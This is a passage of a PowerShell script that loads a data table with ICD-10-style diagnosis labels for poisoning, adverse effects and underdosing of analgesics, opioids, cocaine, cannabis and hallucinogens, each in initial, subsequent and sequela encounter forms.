elsewhere classified, assault","Poisoning by antirheumatics, not elsewhere classified, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, assault","Poisoning by antirheumatics, not elsewhere classified, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, assault","Poisoning by antirheumatics, not elsewhere classified, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, undetermined","Poisoning by antirheumatics, not elsewhere classified, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, undetermined","Poisoning by antirheumatics, not elsewhere classified, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, undetermined","Poisoning by antirheumatics, not elsewhere classified, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antirheumatics, not elsewhere classified","Adverse effect of antirheumatics, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antirheumatics, not elsewhere classified","Adverse effect of antirheumatics, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antirheumatics, not elsewhere classified","Adverse effect of antirheumatics, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antirheumatics, not elsewhere classified","Underdosing of antirheumatics, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antirheumatics, not elsewhere classified","Underdosing of antirheumatics, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antirheumatics, not elsewhere classified","Underdosing of antirheumatics, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, accidental (unintentional)","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, accidental (unintentional)","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, accidental (unintentional)","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, intentional self-harm","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, intentional self-harm","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, intentional self-harm","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, assault","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, assault","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, assault","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, undetermined","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, undetermined","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, undetermined","Poisoning by other nonopioid analgesics and antipyretics, not elsewhere classified, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other nonopioid analgesics and antipyretics, not elsewhere classified","Adverse effect of other nonopioid analgesics and antipyretics, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other nonopioid analgesics and antipyretics, not elsewhere classified","Adverse effect of other nonopioid analgesics and antipyretics, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other nonopioid analgesics and antipyretics, not elsewhere classified","Adverse effect of other nonopioid analgesics and antipyretics, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other nonopioid analgesics and antipyretics, not elsewhere classified","Underdosing of other nonopioid analgesics and antipyretics, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other nonopioid analgesics and antipyretics, not elsewhere classified","Underdosing of other nonopioid analgesics and antipyretics, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other nonopioid analgesics and antipyretics, not elsewhere classified","Underdosing of other nonopioid analgesics and antipyretics, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, accidental (unintentional)","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, accidental (unintentional)","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, accidental (unintentional)","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, intentional self-harm","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, intentional self-harm","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, intentional self-harm","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, assault","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, assault","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, assault","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, undetermined","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, undetermined","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, undetermined","Poisoning by unspecified nonopioid analgesic, antipyretic and antirheumatic, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified nonopioid analgesic, antipyretic and antirheumatic","Adverse effect of unspecified nonopioid analgesic, antipyretic and antirheumatic, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified nonopioid analgesic, antipyretic and antirheumatic","Adverse effect of unspecified nonopioid analgesic, antipyretic and antirheumatic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified nonopioid analgesic, antipyretic and antirheumatic","Adverse effect of unspecified nonopioid analgesic, antipyretic and antirheumatic, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified nonopioid analgesic, antipyretic and antirheumatic","Underdosing of unspecified nonopioid analgesic, antipyretic and antirheumatic, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified nonopioid analgesic, antipyretic and antirheumatic","Underdosing of unspecified nonopioid analgesic, antipyretic and antirheumatic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified nonopioid analgesic, antipyretic and antirheumatic","Underdosing of unspecified nonopioid analgesic, antipyretic and antirheumatic, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, accidental (unintentional)","Poisoning by opium, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, accidental (unintentional)","Poisoning by opium, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, accidental (unintentional)","Poisoning by opium, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, intentional self-harm","Poisoning by opium, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, intentional self-harm","Poisoning by opium, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, intentional self-harm","Poisoning by opium, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, assault","Poisoning by opium, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, assault","Poisoning by opium, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, assault","Poisoning by opium, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, undetermined","Poisoning by opium, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, undetermined","Poisoning by opium, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by opium, undetermined","Poisoning by opium, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of opium","Adverse effect of opium, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of opium","Adverse effect of opium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of opium","Adverse effect of opium, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of opium","Underdosing of opium, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of opium","Underdosing of opium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of opium","Underdosing of opium, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, accidental (unintentional)","Poisoning by heroin, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, accidental (unintentional)","Poisoning by heroin, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, accidental (unintentional)","Poisoning by heroin, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, intentional self-harm","Poisoning by heroin, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, intentional self-harm","Poisoning by heroin, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, intentional self-harm","Poisoning by heroin, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, assault","Poisoning by heroin, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, assault","Poisoning by heroin, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, assault","Poisoning by heroin, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, undetermined","Poisoning by heroin, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, undetermined","Poisoning by heroin, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by heroin, undetermined","Poisoning by heroin, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, accidental (unintentional)","Poisoning by other opioids, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, accidental (unintentional)","Poisoning by other opioids, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, accidental (unintentional)","Poisoning by other opioids, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, intentional self-harm","Poisoning by other opioids, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, intentional self-harm","Poisoning by other opioids, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, intentional self-harm","Poisoning by other opioids, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, assault","Poisoning by other opioids, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, assault","Poisoning by other opioids, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, assault","Poisoning by other opioids, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, undetermined","Poisoning by other opioids, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, undetermined","Poisoning by other opioids, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other opioids, undetermined","Poisoning by other opioids, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other opioids","Adverse effect of other opioids, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other opioids","Adverse effect of other opioids, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other opioids","Adverse effect of other opioids, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other opioids","Underdosing of other opioids, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other opioids","Underdosing of other opioids, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other opioids","Underdosing of other opioids, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, accidental (unintentional)","Poisoning by methadone, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, accidental (unintentional)","Poisoning by methadone, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, accidental (unintentional)","Poisoning by methadone, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, intentional self-harm","Poisoning by methadone, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, intentional self-harm","Poisoning by methadone, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, intentional self-harm","Poisoning by methadone, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, assault","Poisoning by methadone, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, assault","Poisoning by methadone, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, assault","Poisoning by methadone, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, undetermined","Poisoning by methadone, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, undetermined","Poisoning by methadone, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methadone, undetermined","Poisoning by methadone, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of methadone","Adverse effect of methadone, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of methadone","Adverse effect of methadone, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of methadone","Adverse effect of methadone, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of methadone","Underdosing of methadone, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of methadone","Underdosing of methadone, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of methadone","Underdosing of methadone, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, accidental (unintentional)","Poisoning by other synthetic narcotics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, accidental (unintentional)","Poisoning by other synthetic narcotics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, accidental (unintentional)","Poisoning by other synthetic narcotics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, intentional self-harm","Poisoning by other synthetic narcotics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, intentional self-harm","Poisoning by other synthetic narcotics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, intentional self-harm","Poisoning by other synthetic narcotics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, assault","Poisoning by other synthetic narcotics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, assault","Poisoning by other synthetic narcotics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, assault","Poisoning by other synthetic narcotics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, undetermined","Poisoning by other synthetic narcotics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, undetermined","Poisoning by other synthetic narcotics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other synthetic narcotics, undetermined","Poisoning by other synthetic narcotics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other synthetic narcotics","Adverse effect of other synthetic narcotics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other synthetic narcotics","Adverse effect of other synthetic narcotics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other synthetic narcotics","Adverse effect of other synthetic narcotics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other synthetic narcotics","Underdosing of other synthetic narcotics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other synthetic narcotics","Underdosing of other synthetic narcotics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other synthetic narcotics","Underdosing of other synthetic narcotics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, accidental (unintentional)","Poisoning by cocaine, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, accidental (unintentional)","Poisoning by cocaine, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, accidental (unintentional)","Poisoning by cocaine, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, intentional self-harm","Poisoning by cocaine, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, intentional self-harm","Poisoning by cocaine, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, intentional self-harm","Poisoning by cocaine, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, assault","Poisoning by cocaine, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, assault","Poisoning by cocaine, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, assault","Poisoning by cocaine, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, undetermined","Poisoning by cocaine, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, undetermined","Poisoning by cocaine, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cocaine, undetermined","Poisoning by cocaine, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of cocaine","Adverse effect of cocaine, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of cocaine","Adverse effect of cocaine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of cocaine","Adverse effect of cocaine, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of cocaine","Underdosing of cocaine, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of cocaine","Underdosing of cocaine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of cocaine","Underdosing of cocaine, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, accidental (unintentional)","Poisoning by unspecified narcotics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, accidental (unintentional)","Poisoning by unspecified narcotics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, accidental (unintentional)","Poisoning by unspecified narcotics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, intentional self-harm","Poisoning by unspecified narcotics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, intentional self-harm","Poisoning by unspecified narcotics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, intentional self-harm","Poisoning by unspecified narcotics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, assault","Poisoning by unspecified narcotics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, assault","Poisoning by unspecified narcotics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, assault","Poisoning by unspecified narcotics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, undetermined","Poisoning by unspecified narcotics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, undetermined","Poisoning by unspecified narcotics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified narcotics, undetermined","Poisoning by unspecified narcotics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified narcotics","Adverse effect of unspecified narcotics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified narcotics","Adverse effect of unspecified narcotics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified narcotics","Adverse effect of unspecified narcotics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified narcotics","Underdosing of unspecified narcotics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified narcotics","Underdosing of unspecified narcotics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified narcotics","Underdosing of unspecified narcotics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, accidental (unintentional)","Poisoning by other narcotics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, accidental (unintentional)","Poisoning by other narcotics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, accidental (unintentional)","Poisoning by other narcotics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, intentional self-harm","Poisoning by other narcotics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, intentional self-harm","Poisoning by other narcotics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, intentional self-harm","Poisoning by other narcotics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, assault","Poisoning by other narcotics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, assault","Poisoning by other narcotics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, assault","Poisoning by other narcotics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, undetermined","Poisoning by other narcotics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, undetermined","Poisoning by other narcotics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other narcotics, undetermined","Poisoning by other narcotics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other narcotics","Adverse effect of other narcotics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other narcotics","Adverse effect of other narcotics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other narcotics","Adverse effect of other narcotics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other narcotics","Underdosing of other narcotics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other narcotics","Underdosing of other narcotics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other narcotics","Underdosing of other narcotics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), accidental (unintentional)","Poisoning by cannabis (derivatives), accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), accidental (unintentional)","Poisoning by cannabis (derivatives), accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), accidental (unintentional)","Poisoning by cannabis (derivatives), accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), intentional self-harm","Poisoning by cannabis (derivatives), intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), intentional self-harm","Poisoning by cannabis (derivatives), intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), intentional self-harm","Poisoning by cannabis (derivatives), intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), assault","Poisoning by cannabis (derivatives), assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), assault","Poisoning by cannabis (derivatives), assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), assault","Poisoning by cannabis (derivatives), assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), undetermined","Poisoning by cannabis (derivatives), undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), undetermined","Poisoning by cannabis (derivatives), undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cannabis (derivatives), undetermined","Poisoning by cannabis (derivatives), undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of cannabis (derivatives)","Adverse effect of cannabis (derivatives), initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of cannabis (derivatives)","Adverse effect of cannabis (derivatives), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of cannabis (derivatives)","Adverse effect of cannabis (derivatives), sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of cannabis (derivatives)","Underdosing of cannabis (derivatives), initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of cannabis (derivatives)","Underdosing of cannabis (derivatives), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of cannabis (derivatives)","Underdosing of cannabis (derivatives), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], accidental (unintentional)","Poisoning by lysergide [LSD], accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], accidental (unintentional)","Poisoning by lysergide [LSD], accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], accidental (unintentional)","Poisoning by lysergide [LSD], accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], intentional self-harm","Poisoning by lysergide [LSD], intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], intentional self-harm","Poisoning by lysergide [LSD], intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], intentional self-harm","Poisoning by lysergide [LSD], intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], assault","Poisoning by lysergide [LSD], assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], assault","Poisoning by lysergide [LSD], assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], assault","Poisoning by lysergide [LSD], assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], undetermined","Poisoning by lysergide [LSD], undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], undetermined","Poisoning by lysergide [LSD], undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by lysergide [LSD], undetermined","Poisoning by lysergide [LSD], undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], accidental (unintentional)","Poisoning by unspecified psychodysleptics [hallucinogens], accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], accidental (unintentional)","Poisoning by unspecified psychodysleptics [hallucinogens], accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], accidental (unintentional)","Poisoning by unspecified psychodysleptics [hallucinogens], accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], intentional self-harm","Poisoning by unspecified psychodysleptics [hallucinogens], intentional self-harm, initial encounter") + $null = 